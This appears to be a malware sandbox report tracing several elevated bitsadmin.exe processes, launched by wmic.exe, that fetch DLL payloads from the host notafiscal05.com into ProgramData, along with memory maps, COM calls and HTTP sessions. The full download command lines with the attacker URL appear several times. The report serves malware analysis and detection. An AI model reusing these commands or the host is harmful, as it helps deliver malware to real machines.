Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhm98.dll.zip?714489159 C:\ProgramData\tempa\marxvxinhhm98.dll
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:16, Reason: Child Process
Unmonitor	End Time: 00:01:19, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0xdd4
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x DD8 0x DEC 0x DF0 0x DF4 0x DF8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	r	-
private_0x0000000000100000	0x00100000	0x0010ffff	Private Memory	rw	-
pagefile_0x0000000000110000	0x00110000	0x001d7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001e0000	0x001e0000	0x001e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001f0000	0x001f0000	0x001f1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x00200000	0x00200fff	Memory Mapped File	rw	-
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	rw	-
pagefile_0x0000000000310000	0x00310000	0x00410fff	Pagefile Backed Memory	r	-
private_0x0000000000420000	0x00420000	0x00420fff	Private Memory	rw	-
private_0x0000000000430000	0x00430000	0x00430fff	Private Memory	rw	-
rpcss.dll	0x00440000	0x0049bfff	Memory Mapped File	r	-
private_0x0000000000440000	0x00440000	0x0064ffff	Private Memory	rw	-
pagefile_0x0000000000440000	0x00440000	0x0051efff	Pagefile Backed Memory	r	-
pagefile_0x0000000000520000	0x00520000	0x00520fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000530000	0x00530000	0x00530fff	Pagefile Backed Memory	r	-
rsaenh.dll	0x00540000	0x0057bfff	Memory Mapped File	r	-
private_0x0000000000610000	0x00610000	0x0064ffff	Private Memory	rw	-
private_0x0000000000670000	0x00670000	0x006affff	Private Memory	rw	-
private_0x0000000000710000	0x00710000	0x0074ffff	Private Memory	rw	-
bitsadmin.exe	0x00760000	0x007a3fff	Memory Mapped File	rwx	-
pagefile_0x00000000007b0000	0x007b0000	0x013affff	Pagefile Backed Memory	r	-
private_0x00000000013b0000	0x013b0000	0x013effff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x014affff	Private Memory	rw	-
sortdefault.nls	0x014b0000	0x0177efff	Memory Mapped File	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhm98.dll.zip?714489159, filename = C:\ProgramData\tempa\marxvxinhhm98.dll	1	Fn

File (88)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	15	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	10	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	23	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 11	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0x760000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (12)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	4	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:04 (UTC)	4	Fn
Get Time	type = Ticks, time = 135112	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:05 (UTC)	2	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	397 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	397
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhm98.dll.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhm98.dll.zip?714489159	1	Fn

Process #20: bitsadmin.exe

107

4

»

Information	Value
ID	#20
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?31092521 C:\ProgramData\tempa\marxvxinhhm64.dll
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:18, Reason: Child Process
Unmonitor	End Time: 00:01:20, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

»

Information	Value
PID	0xe58
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x E5C 0x E70 0x E74 0x E78 0x E7C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x000e0000	0x000e0fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
rpcss.dll	0x00110000	0x0016bfff	Memory Mapped File	r	-
pagefile_0x0000000000110000	0x00110000	0x00110fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	r	-
rsaenh.dll	0x00130000	0x0016bfff	Memory Mapped File	r	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	rw	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
pagefile_0x00000000001b0000	0x001b0000	0x00277fff	Pagefile Backed Memory	r	-
private_0x0000000000280000	0x00280000	0x002bffff	Private Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x003effff	Private Memory	rw	-
pagefile_0x00000000003f0000	0x003f0000	0x004f0fff	Pagefile Backed Memory	r	-
bitsadmin.exe	0x00530000	0x00573fff	Memory Mapped File	rwx	-
private_0x0000000000580000	0x00580000	0x0064ffff	Private Memory	rw	-
private_0x00000000005b0000	0x005b0000	0x005effff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0064ffff	Private Memory	rw	-
private_0x00000000006c0000	0x006c0000	0x006cffff	Private Memory	rw	-
pagefile_0x00000000006d0000	0x006d0000	0x012cffff	Pagefile Backed Memory	r	-
pagefile_0x00000000012d0000	0x012d0000	0x013aefff	Pagefile Backed Memory	r	-
private_0x0000000001400000	0x01400000	0x0143ffff	Private Memory	rw	-
sortdefault.nls	0x01440000	0x0170efff	Memory Mapped File	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd4000	0x7ffd4000	0x7ffd4fff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?31092521, filename = C:\ProgramData\tempa\marxvxinhhm64.dll	1	Fn

File (88)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	15	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	10	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	23	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 23	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0x530000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (12)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	4	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:06 (UTC)	5	Fn
Get Time	type = Ticks, time = 136766	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:07 (UTC)	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	396 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	396
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmhh.dll.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?31092521	1	Fn

Process #21: bitsadmin.exe

122

4

»

Information	Value
ID	#21
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?86737238 C:\ProgramData\xxx6000137xx\marxvxinhhm64528113361.dll
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:19, Reason: Child Process
Unmonitor	End Time: 00:01:20, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

»

Information	Value
PID	0xe8c
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x E90 0x EA4 0x EA8 0x EAC 0x EB0

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000190000	0x00190000	0x00196fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe	0x001b0000	0x001f3fff	Memory Mapped File	rwx	-
bitsadmin.exe.mui	0x00200000	0x00200fff	Memory Mapped File	rw	-
private_0x0000000000210000	0x00210000	0x00210fff	Private Memory	rw	-
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	rw	-
rpcss.dll	0x00230000	0x0028bfff	Memory Mapped File	r	-
pagefile_0x0000000000230000	0x00230000	0x00230fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000240000	0x00240000	0x00240fff	Pagefile Backed Memory	r	-
rsaenh.dll	0x00250000	0x0028bfff	Memory Mapped File	r	-
private_0x0000000000290000	0x00290000	0x002cffff	Private Memory	rw	-
pagefile_0x00000000002d0000	0x002d0000	0x003d0fff	Pagefile Backed Memory	r	-
private_0x0000000000410000	0x00410000	0x0050ffff	Private Memory	rw	-
private_0x0000000000510000	0x00510000	0x0067ffff	Private Memory	rw	-
pagefile_0x0000000000510000	0x00510000	0x005eefff	Pagefile Backed Memory	r	-
private_0x0000000000640000	0x00640000	0x0067ffff	Private Memory	rw	-
private_0x0000000000690000	0x00690000	0x0069ffff	Private Memory	rw	-
pagefile_0x00000000006a0000	0x006a0000	0x0129ffff	Pagefile Backed Memory	r	-
private_0x00000000012b0000	0x012b0000	0x012effff	Private Memory	rw	-
private_0x0000000001330000	0x01330000	0x0136ffff	Private Memory	rw	-
sortdefault.nls	0x01370000	0x0163efff	Memory Mapped File	r	-
private_0x0000000001760000	0x01760000	0x0179ffff	Private Memory	rw	-
private_0x0000000001850000	0x01850000	0x0188ffff	Private Memory	rw	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?86737238, filename = C:\ProgramData\xxx6000137xx\marxvxinhhm64528113361.dll	1	Fn

File (102)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	18	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	12	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	6	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	28	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 23	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0x1b0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (13)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	4	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:07 (UTC)	6	Fn
Get Time	type = Ticks, time = 137904	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:08 (UTC)	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	396 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
